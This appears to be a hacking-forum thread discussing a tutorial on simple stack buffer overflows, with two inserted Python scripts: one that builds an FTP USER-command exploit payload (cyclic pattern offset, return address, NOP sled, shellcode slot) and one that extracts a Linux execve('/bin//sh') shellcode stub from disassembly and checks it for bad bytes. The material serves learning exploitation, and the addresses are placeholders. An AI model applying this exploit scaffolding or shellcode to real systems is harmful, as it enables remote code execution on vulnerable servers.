Writing Simple Buffer Overflow exploits
  • Xin
    Posts: 3,251
    said:

    Just finished writing an exploit for some FTP software, not a private one but it still feels good when that shell spawns :) your tutorial was a good reference for it

    said:

    Did you find the vuln or was it already known?

    said:

    known unfortunately, I was just practicing some exploitation rather than finding some.

    said:

    Ahh I see. Mind sharing the vuln I wanna try ;)

    Btw.... Not pointing fingers but this looks awfully similar to
    http://www.corelan.be:8800/index.php/20 ... overflows/

    Just came across that site and saw that too haha :P, I tried to make my exploit without a tutorial as I'd learn more.
    Xin
  • D4rk357
    Posts: 34
    said:

    Ahh I see. Mind sharing the vuln I wanna try ;)

    Btw.... Not pointing fingers but this looks awfully similar to
    http://www.corelan.be:8800/index.php/20 ... overflows/

    Every stack-based simple buffer overflow will look awfully similar :). Also a few key differences:

    ---> Different scripting language used
    ---> Different debugger used

    and as far as the concept is concerned it will always be the same in this kind of exploit :)
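Added example, not code from this thread or from the tutorial it discusses: the steps D4rk357 says every simple stack-based overflow shares, written as a Python script in the Perl/Python exploit style the thread compares. Find the offset of the saved return address with a cyclic pattern, pick a return address, lay out junk + return address + NOP sled + shellcode, and frame it as the FTP command the target parses. The crash value 0x39654138, the return address 0xDEADBEEF, the 500-byte buffer and the INT3 stand-in for shellcode are all constructed placeholders; the real values come out of the debugger session against the target.

```python
import string
import struct
from typing import Optional


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern Aa0Aa1Aa2...: every 4-byte window is
    unique within the first 20280 bytes, so whatever lands in EIP after the
    crash pins down where the saved return address sits in the buffer."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_value: int, length: int = 20280) -> int:
    """Map the EIP value the debugger shows back to an offset in the pattern.
    x86 is little-endian, so EIP = 0x39654138 means the bytes b'8Ae9' were
    in the buffer. Returns -1 if the value did not come from the pattern."""
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


# Placeholder, not a real address: stands in for the JMP ESP (or equivalent)
# the exploit writer locates in the debugger in a module that is not rebased.
RET_ADDR = 0xDEADBEEF


def build_payload(offset: int, ret_addr: int, shellcode: bytes,
                  nop_sled: int = 16, total: Optional[int] = None) -> bytes:
    """Classic layout: junk up to the saved return address, the return
    address packed little-endian, a NOP sled, the shellcode, then padding so
    the buffer is the same size as the one that produced the crash."""
    payload = (b"A" * offset
               + struct.pack("<I", ret_addr)
               + b"\x90" * nop_sled
               + shellcode)
    if total is not None:
        if len(payload) > total:
            raise ValueError("payload is longer than the buffer that crashed the target")
        payload += b"C" * (total - len(payload))
    return payload


def ftp_user_command(payload: bytes) -> bytes:
    """Frame the buffer as the FTP USER command the server parses. The server
    typically reads one CRLF-terminated line into a C string, so CR, LF and
    NUL in the buffer would cut it short before the return address is reached."""
    for bad in (b"\x00", b"\x0a", b"\x0d"):
        if bad in payload:
            raise ValueError("payload contains a line-terminating byte: %r" % bad)
    return b"USER " + payload + b"\r\n"


if __name__ == "__main__":
    # Stage 1: send a pattern instead of plain A's so the crash is informative.
    crash_buffer = pattern_create(500)
    # Stage 2: the debugger shows EIP after the crash; 0x39654138 is a
    # constructed value, not taken from any real target.
    offset = pattern_offset(0x39654138)
    # Stage 3: INT3 breakpoints stand in for shellcode; hitting them in the
    # debugger confirms execution reached the sled before a real payload goes in.
    breakpoints = b"\xcc" * 32
    exploit = ftp_user_command(build_payload(offset, RET_ADDR, breakpoints, total=500))
    print("offset", offset, "len", len(exploit))
```

Swapping Perl for Python changes nothing above except syntax; what changes between targets is the offset, the return address, and which bytes the parser refuses to carry.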
  • said:

    Every stack-based simple buffer overflow will look awfully similar :). Also a few key differences:

    ---> Different scripting language used
    ---> Different debugger used

    and as far as the concept is concerned it will always be the same in this kind of exploit :)

    True. Although it's not that hard to change Perl to Python. And just to add, the guide wasn't explained as well as the guide on the site. I'd add more of an explanation to this.
  • D4rk357
    Posts: 34
    said:

    True. Although it's not that hard to change Perl to Python. And just to add, the guide wasn't explained as well as the guide on the site. I'd add more of an explanation to this.

    lol ... you are right ... It's not hard to change Perl to Python or Ruby or something else. What is important is learning the concept, and just to make sure I learned it I did it differently .. different debugger and scripting language, and yeah, oh well, writing the guide I did it my way and you have every right to love it or hate it or say you're skeptical, it is not you, it was written by somebody else and all :). Also see tutorials of any concept .. for e.g. SQLi they all look the same coz the core concept behind an exploitation technique is always the same .. it doesn't change with tutorials :). .....
  • Sh3llc0d3
    Posts: 1,910
    Well I got round to looking deeper into shellcoding tonight. I read through this tutorial and the one on the site (went through the entire tut) and I've gotta say I'm definitely going to buy a book on shellcoding. I still see no need to change from Perl to Python :P, however that's probably due to the amount of coding in Perl I've done recently, which I love.

    You did the tutorial well, as learning this kinda thing without pictures would be a challenge to say the least (in my opinion). I can actually say I've learned a lot tonight, so thanks.
  • D4rk357
    Posts: 34
    said:


    Well I got round to looking deeper into shellcoding tonight. I read through this tutorial and the one on the site (went through the entire tut) and I've gotta say I'm definitely going to buy a book on shellcoding. I still see no need to change from Perl to Python :P, however that's probably due to the amount of coding in Perl I've done recently, which I love.

    You did the tutorial well, as learning this kinda thing without pictures would be a challenge to say the least (in my opinion). I can actually say I've learned a lot tonight, so thanks.



    Thanks dude .. :)
  • said:


    Well I got round to looking deeper into shellcoding tonight. I read through this tutorial and the one on the site (went through the entire tut) and I've gotta say I'm definitely going to buy a book on shellcoding. I still see no need to change from Perl to Python :P, however that's probably due to the amount of coding in Perl I've done recently, which I love.

    You did the tutorial well, as learning this kinda thing without pictures would be a challenge to say the least (in my opinion). I can actually say I've learned a lot tonight, so thanks.


    Hm, couldn't you just write a shellcoder in Perl or get a shellcode generator? Or, you can read Hacking: The Art of Exploitation. It has a great section on shellcoding. You know, getting hex values of C programs and using them to create shellcode and such.
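Added example, not code from this thread or from the book mentioned above: the "getting hex values" step as a Python script. It pulls the raw bytes out of objdump-style disassembly, emits the "\x.." string a Perl or Python exploit embeds, and scans it for bytes an FTP command line will not carry intact. Both listings are constructed sample input (the textbook Linux x86 execve("/bin//sh") stub, and the same syscall setup the way a compiler usually emits it); the parser assumes objdump's default one-instruction-per-line layout and the FTP_BAD_CHARS set is an assumption about the target's parser, not something taken from the thread.

```python
import re
from typing import List, Tuple

# Constructed sample in objdump -d layout (offset, bytes, mnemonic) of the
# textbook Linux x86 execve("/bin//sh") stub; it exists here only as input.
OBJDUMP_SAMPLE = """
00000000 <_start>:
   0:   31 c0                   xor    %eax,%eax
   2:   50                      push   %eax
   3:   68 2f 2f 73 68          push   $0x68732f2f
   8:   68 2f 62 69 6e          push   $0x6e69622f
   d:   89 e3                   mov    %esp,%ebx
   f:   50                      push   %eax
  10:   53                      push   %ebx
  11:   89 e1                   mov    %esp,%ecx
  13:   b0 0b                   mov    $0xb,%al
  15:   cd 80                   int    $0x80
"""

# Constructed sample of the same syscall setup the way a C compiler usually
# emits it: a full 32-bit immediate, which drags NUL bytes into the shellcode.
COMPILED_SAMPLE = """
   0:   b8 0b 00 00 00          mov    $0xb,%eax
   5:   cd 80                   int    $0x80
"""

# "  13:   b0 0b   mov ..." -> the run of two-hex-digit groups after the offset.
_LINE = re.compile(r"^\s*[0-9a-f]+:\s+((?:[0-9a-f]{2}\s)+)")


def parse_objdump(text: str) -> bytes:
    """Collect the byte column of every instruction line. Symbol lines such as
    '00000000 <_start>:' have no byte column and are skipped. Assumes each
    instruction's bytes are on one line (objdump wraps very long ones)."""
    code = bytearray()
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            code += bytes.fromhex(re.sub(r"\s", "", m.group(1)))
    return bytes(code)


def to_escaped(code: bytes) -> str:
    """The literal an exploit script embeds, e.g. "\\x31\\xc0\\x50..."."""
    return "".join("\\x%02x" % b for b in code)


# Assumed bad characters for a line-based FTP command: NUL ends a C string,
# CR/LF ends the command. Other targets filter other bytes; confirm per target.
FTP_BAD_CHARS = b"\x00\x0a\x0d"


def find_bad_chars(code: bytes, bad: bytes = FTP_BAD_CHARS) -> List[Tuple[int, int]]:
    """(offset, byte) for every byte the target would truncate on or mangle;
    an empty list means the shellcode can go in as-is, otherwise it needs
    rewriting (as the mov $0xb,%al form does) or an encoder."""
    return [(i, b) for i, b in enumerate(code) if b in bad]


if __name__ == "__main__":
    handwritten = parse_objdump(OBJDUMP_SAMPLE)
    print(len(handwritten), "bytes:", to_escaped(handwritten))
    print("bad chars, handwritten stub:", find_bad_chars(handwritten))
    print("bad chars, compiled stub:", find_bad_chars(parse_objdump(COMPILED_SAMPLE)))
```

The second listing is why hex-dumping a compiled C function rarely gives usable shellcode on its own: the compiler's 32-bit immediates and absolute addresses bring NUL bytes with them, and the scan reports exactly where.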
  • Xin
    Posts: 3,251
    I think chronic meant it's similar in that isn't it the same vulnerable app?
    Xin
  • D4rk357
    Posts: 34
    said:


    I think chronic meant it's similar in that isn't it the same vulnerable app?


    No, it's a different application :)

    And as far as shellcoding is concerned, The Shellcoder's Handbook is by far the best shellcoding book I have ever got my hands on :)
  • Bursihido
    Posts: 406
    LOL You should also check this chroniccommand http://in.linkedin.com/in/d4rk357
  • said:


    LOL You should also check this chroniccommand http://in.linkedin.com/in/d4rk357



    Lol so?
  • undead
    Posts: 822
    Nice tutorial. Good work.
  • gizmodo
    Posts: 8
    I like this, very nice.
  • gringoire
    Posts: 12
    Really good tutorial, was looking for something like that.
    Thank you.
  • McKittrick
    Posts: 194
    I think buffer overflow tuts have now been done to death. I'd like to see more talk about heap overflows (something which doesn't get mentioned enough).
  • Sh3llc0d3
    Posts: 1,910
    said:


    I think buffer overflow tuts have now been done to death. I'd like to see more talk about heap overflows (something which doesn't get mentioned enough).



    I wouldn't attempt to write a BoF or HoF tutorial just based on the fact that there are awesome tutorials around; Peter's one over at Corelan is the best series I've seen for completeness.